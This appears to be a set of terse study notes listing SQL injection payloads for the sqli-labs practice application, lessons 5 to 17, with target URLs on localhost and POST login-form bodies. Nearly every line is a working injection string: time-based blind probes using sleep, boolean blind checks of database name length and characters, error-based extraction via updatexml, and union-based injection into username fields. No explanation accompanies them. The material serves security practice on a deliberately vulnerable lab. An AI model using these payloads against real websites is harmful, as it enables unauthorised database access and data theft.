1' and sleep(10) -- -
1' and if(length(database())=4,1,1=2) -- -
1' and if((ascii(substr(database(),1,1)))=100,1,2=1) -- -
1 and sleep(10) -- -
抓包
1 and if(length(database())=4,1,1=2)
1 and if((ascii(substr(database(),1,1)))=100,1,2=1)
1' and sleep(10) -- -
1' and if(length(database())=4,1,1=2) -- -
1' and if((ascii(substr(database(),1,1)))=100,1=1,2=1) -- -
5.
http://localhost/sqli-labs-master/Less-5/?id=1' 1=1 --
http://localhost/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database())),1) -- -
6.
http://localhost/sqli-labs-master/Less-5/?id=1" -- -
http://localhost/sqli-labs-master/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database())),1) -- -
7.
http://localhost/sqli-labs-master/Less-7/?id=1" -- -
http://localhost/sqli-labs-master/Less-7/?id=1')) and if(length(database())=8,1,1=2) -- -
http://localhost/sqli-labs-master/Less-7/?id=1')) and if((ascii(substr(database(),1,1)))=115,1,2=1) -- -
8.
http://localhost/sqli-labs-master/Less-8/?id=1' -- -
http://localhost/sqli-labs-master/Less-8/?id=1' and if(length(database())=8,1,1=2) -- -
http://localhost/sqli-labs-master/Less-8/?id=1' and if((ascii(substr(database(),1,1)))=115,1,2=1) -- -
9.
http://localhost/sqli-labs-master/Less-9/?id=1' and sleep(10) -- -
http://localhost/sqli-labs-master/Less-9/?id=1' and if(length(database())=8,sleep(10),1=2) -- -
http://localhost/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1)))=115,sleep(10),2=1) -- -
10.
http://localhost/sqli-labs-master/Less-10/?id=1" and sleep(10) -- -
http://localhost/sqli-labs-master/Less-10/?id=1" and if(length(database())=8,sleep(10),1=2) -- -
http://localhost/sqli-labs-master/Less-10/?id=1" and if((ascii(substr(database(),1,1)))=115,sleep(10),2=1) --
11.
uname=123' &passwd=123&submit=Submit
uname=123' union select database(),1 -- - &passwd=123&submit=Submit
12.
uname=123") -- -&passwd=123&submit=Submit
uname=123")union select database(),1 -- -&passwd=123&submit=Submit
13.
uname=1') -- -&passwd=&submit=Submit
uname=1') and updatexml(1,concat(0x7e,(select database())),1) -- -&passwd=&submit=Submit
14.
uname=123" -- -&passwd=&submit=Submit
uname=123" and updatexml(1,concat(0x7e,(select database())),1) -- -&passwd=&submit=Submit
15.
uname=123' or 123 -- -&passwd=&submit=Submit
uname=123' or (if((length(database())=8),1,2=1))-- -&passwd=&submit=Submit
uname=123' or (if((ascii(substr(database(),1,1)))=115,1,2=1))-- -&passwd=&submit=Submit
16.
uname=1") or 1 -- -&passwd=&submit=Submit
uname=123") or (if((length(database())=8),1,2=1))-- -&passwd=&submit=Submit
uname=123") or (if((ascii(substr(database(),1,1)))=115,1,2=1))-- -&passwd=&submit=Submit
17.
uname=admin&passwd=123.com' or updatexml(1,concat(0x7e,database()),1)#&submit=Submit
18.